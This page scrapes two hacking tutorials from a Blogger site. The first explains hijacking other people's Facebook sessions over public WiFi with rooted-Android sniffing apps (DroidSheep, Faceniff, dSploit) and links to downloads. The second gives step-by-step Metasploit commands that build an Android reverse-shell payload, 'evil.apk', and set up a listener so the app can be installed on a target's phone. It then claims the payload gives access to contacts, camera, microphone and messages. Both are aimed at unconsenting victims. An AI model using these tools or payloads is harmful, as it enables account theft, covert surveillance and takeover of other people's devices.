<span itemprop="datePublished" style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span class="gray-label-plain pubprint" style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: #999999; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Source :</span></span></span><span style="border: 0px; font-family: inherit; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> </span>Copyed on April 12, 2018 at </span><span class="gray-label-plain pubprint" style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">www.</span></span></span><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: "verdana" , "arial" , "helvetica" , sans-serif; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">letshacksomething.com </span></span></span></span></span></span><span style="border: 0px; font-family: inherit; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: #888888; font-family: "vollkorn" , sans-serif; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Posted by </span><span class="fn" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person" style="border: 0px; color: #888888; font-family: "vollkorn" , sans-serif; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span itemprop="name" style="border: 0px; color: #265f98; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a class="g-profile" data-gapiattached="true" data-gapiscan="true" data-onload="true" href="https://www.blogger.com/profile/09474564561887469944" rel="author" style="border: 0px; color: #265f98; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration-line: none; vertical-align: baseline;" title="author profile">Mahammad Shahid</a></span></span></span></div>
<div class="source-line" style="border: 0px; color: #333333; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span itemprop="datePublished" style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: "verdana" , "arial" , "helvetica" , sans-serif; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> As an advanced reference material, please be able to visit the official website. Thank you</span></span></div>
</div>
</div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-62165487879370508192018-04-12T07:31:00.001-07:002018-04-12T07:50:22.968-07:00Facebook Hacking Tools: Hack Facebook Accounts Using Android Phone<div style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPR9sn8SmOmVVADh4m0UuLktHU1-Nw3zLiYVQVLveW0Xe2iKb54S56n71Ln1FuPIM9X9f2aFe12bwAxaILzlN-iPFbSfGwRJsXX95yeisiJls356RKKh69n5XdGDZkAZ_y7z_p6rwrUyR_/s400/Android-Facebook+copy.jpg" /></div>
<br />
There could be many reasons for hacking someone's Facebook account and it is not so simple as we speak. One should know the fact that there are no direct softwares that can hack Facebook account simply by entering the victim's user id. But it is possible with some methods those really work, out of which phishing, key logging, packet sniffing are most popular and widely used ones. Today, in this tutorial you are going to learn how to perform packet sniffing attack to hack Facebook account using your Android smartphone.<br />
<br />
<b> What exactly is packet sniffing?</b><br />
<br />
<br />
<div style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVxpSE2jDPaAYPth6zA-d-i__OLLJG1iy5ApbM4tBuqzI21hizneFLgoGHC7ufX9fYFf8egAeQmsfoslzeW2ubQfcetLaQx8AwyXAUvI3P1UIApqcX2gBJjeNpCE1TbtxYrpOBnEKiizYR/s400/packet+sniffing.png" /></div>
<br />
Lets make this simple with an example. Consider two persons A and B using the same public WiFi network. The information sent and received between the device and WiFi hot-spot is done in the form of packets. These packets are not secured and can be access by any other device connected to same network. If Person A is using Facebook, his log-in credentials are sent in the form of packets which Person B can access and read them. In fact, Person B can modify them. Not only log-in credentials, everything you use within your browser can be seen and modified by anyone else as long as you are connected to that network.<br />
<div>
<br />
<b> So, Why Android Phone?</b><br />
<br />
Earlier, when this process is first developed the only way to do packet sniffing is using PC or laptop running on Windows or Linux operating system. But now it can be done using any Android phone with root access (we shall talk about this later). The main reason for using Android phone is simplicity. It works same as PC, in terms of speed and accuracy. It has same number of tools as PC. And when you are in crowd, you can simply take out your mobile and do some hacking anonymously.</div>
<div>
<br />
<b> Does the Android Phone require any particular specs?</b><br />
<br />
No particular specifications are needed for your Android device to do this. But your device needs to be rooted. For a brief explanation of what rooting is, read the tutorial on "<span style="color: blue;">How to Root Any Android Device</span>".<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgutWNd3lPrH4u1yDo8-EpXsqSE9cIpdA3k0UyDnu9SYoBMdfwi6IPRBoZdwbFSsXZ9X5Mi5ipU-uqw9u_JXk7w-YQZDQ_ElDluLgq1tHIiA_KCmccqtJsQ_q2QlVl7cDob-5ZLyG6Hc3I/s1600/Donation.gif"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgutWNd3lPrH4u1yDo8-EpXsqSE9cIpdA3k0UyDnu9SYoBMdfwi6IPRBoZdwbFSsXZ9X5Mi5ipU-uqw9u_JXk7w-YQZDQ_ElDluLgq1tHIiA_KCmccqtJsQ_q2QlVl7cDob-5ZLyG6Hc3I/s640/Donation.gif" /></a><br />
<br />
<b> Now, what is the main process?</b><br />
<br />
Let's end the intro here. Now lets talk about the main procedure of packet sniffing. This tutorial assumes that you have an Android device, of course rooted. Now all you have to do is, install one of the Applications listed below, connect to a public WiFi network and start hacking people. Usually there are many apps out there that can perform packet sniffing. I have used all such apps and found these three to be working perfect even during poor network signal.<br />
<br />
<b> 1. DroidSheep [Requires Root]</b><br />
<br />
DroidSheep is one of the best app to hack Facebook and other website accounts. DroidSheep cannot get username and password credentials but can grab live sessions of users and show them on your device. Live sessions means, according to our example, if Person B is using Facebook and Gmail in two tabs of his browser, Person A gets exactly the same tabs in his device further which he can modify or access any required content from them. Using DroidSheep you can hack almost any website accounts based on the victim's usage. As DroidSheep is being used for illegal purposes it's download link has been removed from official DroidSheep website. Search Google and you can find it.<br />
<br />
<a href="http://bit.ly/1G89xNL">Download droidsheep Apk</a></div>
<div>
<br />
<b> 2. Faceniff [Requires Root]</b><br />
Faceniff is another tiny application that is used to hack Facebook accounts over WiFi now and then. Unlike DroidSheep, Faceniff is solely created to hack only Facebook accounts. Using Faceniff you can get user id and passwords of the people using Facebook in the same WiFi network.<br />
<br />
<a href="http://sh.st/k4NCS">Download Faceniff Apk</a></div>
<div>
<br />
<b> 3. Dsploit [Requires Root] - Works Best</b><br />
According to me, Dsploit is the best, in terms of penetration testing attacks. Dsploit has a number of pen testing attacks like Router PWN, Port Scanner, Inspector, Vulnerability Finder, MITM attacks and many more. We are going to use MITM attacks for our purpose. MITM stands for Man In The Middle attacks which include Password Sniffer, Session Hijacker, Script Injector out of which we are going to use Password Sniffer to get account passwords over WiFi. If you are curious about this app, explore it and you will find lots of tools in it.<br />
<br />
Download Working & Updated version of Dsploit here: <a href="http://gripdownload.com/419712">DOWNLOAD LINK</a>.<br />
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: vollkorn, sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<div class="source-line" style="border: 0px; color: #333333; font-family: lato, helvetica, arial, sans-serif; font-stretch: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span itemprop="datePublished" style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span class="gray-label-plain pubprint" style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: #999999; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Source :</span></span></span><span style="border: 0px; font-family: inherit; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> </span>Copyed on April 12, 2018 at </span><span class="gray-label-plain pubprint" style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">www.</span></span></span><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: "verdana" , "arial" , "helvetica" , sans-serif; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">letshacksomething.com </span></span></span></span></span></span><span style="font-size: xx-small;"><span style="color: #888888; font-family: "vollkorn" , sans-serif;">Posted by </span><span class="fn" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person" style="border: 0px; color: #888888; font-family: "vollkorn" , sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a class="g-profile" data-gapiattached="true" data-gapiscan="true" data-onload="true" href="https://www.blogger.com/profile/09474564561887469944" rel="author" style="border: 0px; color: #265f98; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration-line: none; vertical-align: baseline;" title="author profile"><span itemprop="name" style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Mahammad Shahid</span></a></span></span></div>
<div class="source-line" style="border: 0px; color: #333333; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span itemprop="datePublished" style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: "verdana" , "arial" , "helvetica" , sans-serif; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> As an advanced reference material, please be able to visit the official website. Thank you</span></span></div>
</div>
</div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-62591318199447410072018-04-12T07:12:00.002-07:002018-04-12T07:26:46.465-07:00Hack To Remotely Control Any Android Device Using Kali Linux or Ubuntu<div style="text-align: center;">
<img height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAFlc6tKea4MLF2Sx_d0xjOimapCYKjgfM7NmoK1X56RkWE6YuiSMbGQCvXUwhCPclYhtk0SsUzR2bvReOy_C8WfrYe24iJJmx_Xh1dN7IO3DmA3HD7E2AG6aykjLa_WtECKQF5F1WmcXQ/s400/PhotoChooser-E98121CF-E63E-B972-5B6B-063.jpg" width="400" /></div>
<br />
<span style="background-color: white; color: #404040; font-family: "vollkorn" , sans-serif; font-size: 16px;">Hello everyone! Today we are back with an awesome tutorial on Hacking Android devices to Control them Remotely. There are,in fact, no user-friendly softwares out there that can simply hack any Android device on the go and retrieve the desired information. So, in order to achieve this we are going to take the coding way(though there is not much code), and we are going to use Linux operating system, Kali Linux and Ubuntu are recommended ones.</span><br />
<span style="background-color: white; color: #404040; font-family: "vollkorn" , sans-serif; font-size: 16px;"><br /></span>
<br />
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<h3 style="border: 0px; clear: both; font-family: Bitter, serif; font-size: 1.6rem; font-style: inherit; margin: 0px 0px 1rem; outline: 0px; padding: 0px; vertical-align: baseline;">
What actually are we doing:</h3>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
In this tutorial, we are going to create a deploy application using Kali Linux Metasploit which should be installed on the target android device. When installed successfully, we can gain full access to that device.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<h3 style="border: 0px; clear: both; font-family: Bitter, serif; font-size: 1.6rem; font-style: inherit; margin: 0px 0px 1rem; outline: 0px; padding: 0px; vertical-align: baseline;">
What will you need:</h3>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
1) A PC or Laptop running on Linux Operating System. If you are on windows or mac, you can do this on Oracle VM VirtualBox. <a href="http://bit.ly/1nlDA5d" rel="nofollow" style="border: 0px; color: #265f98; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration-line: none; vertical-align: baseline;" target="_blank"><span style="border: 0px; color: black; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Download</span></a> it from <a href="http://bit.ly/1nlDA5d" style="border: 0px; color: #265f98; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration-line: none; vertical-align: baseline;" target="_blank">here</a>.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br />
2) Active Internet Connection.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
3) An Android device to test the hack. That's it!</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<h3 style="border: 0px; clear: both; font-family: Bitter, serif; font-size: 1.6rem; font-style: inherit; margin: 0px 0px 1rem; outline: 0px; padding: 0px; vertical-align: baseline;">
What one can do with this hack: </h3>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
By the end of this tutorial, one can perform the below hacks after successfully installing the deploy application on target device.</div>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<ul style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; list-style-image: initial; list-style-position: initial; margin: 0px 0px 1.5em 4rem; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Get contacts (and all theirs informations)</li>
<li style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 0.25em; outline: 0px; padding: 0px; vertical-align: baseline;">Take a picture from the camera</li>
<li style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 0.25em; outline: 0px; padding: 0px; vertical-align: baseline;">Stream sound from microphone (or other sources..)</li>
<li style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 0.25em; outline: 0px; padding: 0px; vertical-align: baseline;">Get all messages</li>
<li style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 0.25em; outline: 0px; padding: 0px; vertical-align: baseline;">Streaming video (for activity based client only)</li>
<li style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 0.25em; outline: 0px; padding: 0px; vertical-align: baseline;">Access file manager and many more...</li>
</ul>
<div style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgutWNd3lPrH4u1yDo8-EpXsqSE9cIpdA3k0UyDnu9SYoBMdfwi6IPRBoZdwbFSsXZ9X5Mi5ipU-uqw9u_JXk7w-YQZDQ_ElDluLgq1tHIiA_KCmccqtJsQ_q2QlVl7cDob-5ZLyG6Hc3I/s1600/Donation.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="301" data-original-width="720" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgutWNd3lPrH4u1yDo8-EpXsqSE9cIpdA3k0UyDnu9SYoBMdfwi6IPRBoZdwbFSsXZ9X5Mi5ipU-uqw9u_JXk7w-YQZDQ_ElDluLgq1tHIiA_KCmccqtJsQ_q2QlVl7cDob-5ZLyG6Hc3I/s640/Donation.gif" width="640" /></a></div>
<br />
<br /></div>
<h3 style="border: 0px; clear: both; font-family: Bitter, serif; font-size: 1.6rem; font-style: inherit; margin: 0px 0px 1rem; outline: 0px; padding: 0px; vertical-align: baseline;">
The Main Procedure:</h3>
</div>
</div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
When you are all set, carefully follow the below steps one by one.(all the code you need to enter will be shown in <span style="border: 0px; color: red; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">red</span> color)</div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<b>step1: </b>Open the terminal in Linux , type the below code and press enter.</div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<b><span style="border: 0px; color: red; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: black; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">:~#</span> msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk</span></b></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<img height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNAf0o7Ml8a0Hy64rdl7pkC_PGOzbCwmVsCWUCXfRi-_uOfDSX1UJ26h-SW0BWhcamjL3T_Ho7YacuKSYxLHgWaQJ8czoLU0VHc8z9s-v_lxNhdc5_p6ZWaUaCm3n0hg2-hxDThvFkKnSe/s400/firstimage.jpg" width="400" /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
If you don't know your ip address, simply open another terminal and type "<b><span style="border: 0px; color: red; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">ifconfig</span></b>" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: you need to do this only when you are connected to Internet).<br />
<br />
<b>Step2: </b>Now the deploy application <b>evil.apk</b> will be automatically generated. You can find it in home folder.<br />
<br />
<b>Step3:</b> Now open another terminal and type the below code.<br />
<br />
<b><span style="border: 0px; color: red; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: black; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">></span> msfconsole</span></b></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<img height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilJrpsTcl62izb80ifKCup_N4_2ag5tQgFu3axkt5_ZFvsG8tqk2KzDA078yCuNU_r-ML-AHW5XYiMMn5vWk8SuMk4Xh5jgLpO-y3MECU44-gyDDjUHz03u_aAVAtE5w5gwpB0wm73AAQ6/s400/2.jpg" width="400" /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
It takes sometime for metasploit to download and load its contents. So be patient!<br />
<br />
<b>Step4:</b> When metasploit successfully loaded type the below code.<br />
<br />
<span style="border: 0px; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b><span style="border: 0px; color: black; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">></span> use exploit/multi/handler</b></span><br />
<span style="border: 0px; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b><span style="border: 0px; color: black; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">> </span>set payload android/meterpreter/reverse_tcp</b></span><br />
<span style="border: 0px; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b><span style="border: 0px; color: black; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">> </span>set lhost 192.168.45.4</b></span> (the same ip address you entered in step1).<br />
<span style="border: 0px; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b><span style="border: 0px; color: black; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">></span> set lport 8080</b></span> (the same port you used in step1).<br />
<span style="border: 0px; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><b><span style="border: 0px; color: black; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">> </span>exploit</b></span></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<img height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7RhyQnpxw-6G6BIES-j6E6UXTqwUkRDg0v-q7opBBdjMhak_3Q1FhVBjkmeyfFiinI1TkNS-qcVDyVjRFQeX-5WLhnGj9c7rSWzBh0c7KqIqib-8ja7hruZdJNcH_yfzXCYNeS_Qb4qIN/s400/3.jpg" width="400" /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
Now the console starts listening to 192.168.45.4 at port 8080.<br />
<br />
<b>Step5: </b>Now all you need to do is, copy the evil.apk from home folder to the target device.<br />
<br />
<b>Step6: </b>Install the evil.apk on the target device and when the device is connected to the internet open the app.<br />
<br />
